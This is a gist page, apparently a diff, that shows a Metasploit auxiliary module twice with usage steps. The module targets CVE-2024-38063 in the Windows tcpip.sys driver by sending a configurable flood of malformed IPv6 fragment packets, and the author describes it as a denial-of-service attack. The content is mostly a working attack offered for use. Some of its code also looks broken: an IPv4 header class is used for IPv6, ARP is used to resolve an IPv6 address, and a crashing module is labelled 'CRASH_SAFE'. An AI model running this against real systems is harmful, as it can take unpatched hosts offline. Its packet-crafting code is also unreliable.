dmaynor · August 27, 2024 21:06
diff --git a/gistfile1.txt b/gistfile1.txt
 Howto
 Copy the below class to modules/auxillary/dos/ipv6

 Then
 msfconsole
 use auxiliary/dos/ipv6/cve_2024_38063_packetfu
 set TARGET_IPV6 <target_ipv6_address>
 set NUM_PACKETS 1000
 run

 Notes
 Ghidra bindiff ftw. This is a DoS, code execution is 
 still being researched. 

 require 'packetfu'

 class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Udp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CVE-2024-38063 IPv6 Fragmentation Vulnerability with PacketFu',
      'Description'    => %q{
        This module exploits a vulnerability in the Windows tcpip.sys driver by sending
        crafted IPv6 packets with malformed no options and fragmentation to trigger a memory corruption.
      },
      'Author'         => ['David Maynor <[email protected]>'],
      'License'        => MSF_LICENSE,
      'References'     => [
        ['CVE', '2024-38063'],
        ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063']
      ],
      'DisclosureDate' => '2024-08-13',
      'DefaultOptions' => {
        'RPORT' => 0
      },
      'Actions'        => [ ['Automatic', {}] ],
      'PassiveOptions' => [
        OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']),
        OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000])
      ],
      'Notes'          => {
        'Stability'    => [ CRASH_SAFE ],
        'SideEffects'  => [ DOS ],
        'Reliability'  => [ REPEATABLE_SESSION ]
      }
    ))

    register_options(
      [
        Opt::RPORT(0),
        OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']),
        OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000])
      ]
    )
  end

  def run
    num_packets = datastore['NUM_PACKETS']
    target_ipv6 = datastore['TARGET_IPV6']

    num_packets.times do |i|
      pkt = build_malicious_ipv6_packet(target_ipv6)
      PacketFu::Utils.sendpkt(pkt, iface: PacketFu::Utils.default_iface, verbose: true)
      print_status("Sent packet #{i + 1}/#{num_packets} to #{target_ipv6}")
    end
  end

  def build_malicious_ipv6_packet(ipv6_addr)
    config = PacketFu::Config.new(PacketFu::Utils.whoami?(:iface => PacketFu::Utils.default_iface))
    eth = PacketFu::EthHeader.new(config: config)
    eth.eth_daddr = PacketFu::EthHeader.str2mac(PacketFu::Utils.arp(ipv6_addr, iface: PacketFu::Utils.default_iface)[:mac_saddr])
    eth.eth_proto = 0x86DD # IPv6

    ipv6 = PacketFu::IPHeader.new
    ipv6.ip_v = 6
    ipv6.ip_dst = ipv6_addr
    ipv6.ip_proto = 44 # Fragment Header

    # Create fragment header and destination options header
    frag_header = PacketFu::IPv6Fragment.new
    frag_header.frag_id = rand(0x10000)
    frag_header.frag_mf = 1
    frag_header.frag_offset = 0

    dest_opts = PacketFu::IPv6DestOpts.new
    dest_opts.options = "\x81\x00\x00\x00" # Malformed Option

    pkt = eth + ipv6 + frag_header + dest_opts
    pkt.recalc
    pkt
  end
 end
	Howto
	Copy the below class to modules/auxillary/dos/ipv6

	Then
	msfconsole
	use auxiliary/dos/ipv6/cve_2024_38063_packetfu
	set TARGET_IPV6 <target_ipv6_address>
	set NUM_PACKETS 1000
	run

	Notes
	Ghidra bindiff ftw. This is a DoS, code execution is
	still being researched.

	require 'packetfu'

	class MetasploitModule < Msf::Auxiliary
	include Msf::Exploit::Remote::Udp

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'CVE-2024-38063 IPv6 Fragmentation Vulnerability with PacketFu',
	'Description' => %q{
	This module exploits a vulnerability in the Windows tcpip.sys driver by sending
	crafted IPv6 packets with malformed no options and fragmentation to trigger a memory corruption.
	},
	'Author' => ['David Maynor <[email protected]>'],
	'License' => MSF_LICENSE,
	'References' => [
	['CVE', '2024-38063'],
	['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063']
	],
	'DisclosureDate' => '2024-08-13',
	'DefaultOptions' => {
	'RPORT' => 0
	},
	'Actions' => [ ['Automatic', {}] ],
	'PassiveOptions' => [
	OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']),
	OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000])
	],
	'Notes' => {
	'Stability' => [ CRASH_SAFE ],
	'SideEffects' => [ DOS ],
	'Reliability' => [ REPEATABLE_SESSION ]
	}
	))

	register_options(
	[
	Opt::RPORT(0),
	OptString.new('TARGET_IPV6', [true, 'Target IPv6 Address']),
	OptInt.new('NUM_PACKETS', [true, 'Number of packets to send', 1000])
	]
	)
	end

	def run
	num_packets = datastore['NUM_PACKETS']
	target_ipv6 = datastore['TARGET_IPV6']

	num_packets.times do \|i\|
	pkt = build_malicious_ipv6_packet(target_ipv6)
	PacketFu::Utils.sendpkt(pkt, iface: PacketFu::Utils.default_iface, verbose: true)
	print_status("Sent packet #{i + 1}/#{num_packets} to #{target_ipv6}")
	end
	end

	def build_malicious_ipv6_packet(ipv6_addr)
	config = PacketFu::Config.new(PacketFu::Utils.whoami?(:iface => PacketFu::Utils.default_iface))
	eth = PacketFu::EthHeader.new(config: config)
	eth.eth_daddr = PacketFu::EthHeader.str2mac(PacketFu::Utils.arp(ipv6_addr, iface: PacketFu::Utils.default_iface)[:mac_saddr])
	eth.eth_proto = 0x86DD # IPv6

	ipv6 = PacketFu::IPHeader.new
	ipv6.ip_v = 6
	ipv6.ip_dst = ipv6_addr
	ipv6.ip_proto = 44 # Fragment Header

	# Create fragment header and destination options header
	frag_header = PacketFu::IPv6Fragment.new
	frag_header.frag_id = rand(0x10000)
	frag_header.frag_mf = 1
	frag_header.frag_offset = 0

	dest_opts = PacketFu::IPv6DestOpts.new
	dest_opts.options = "\x81\x00\x00\x00" # Malformed Option

	pkt = eth + ipv6 + frag_header + dest_opts
	pkt.recalc
	pkt
	end
	end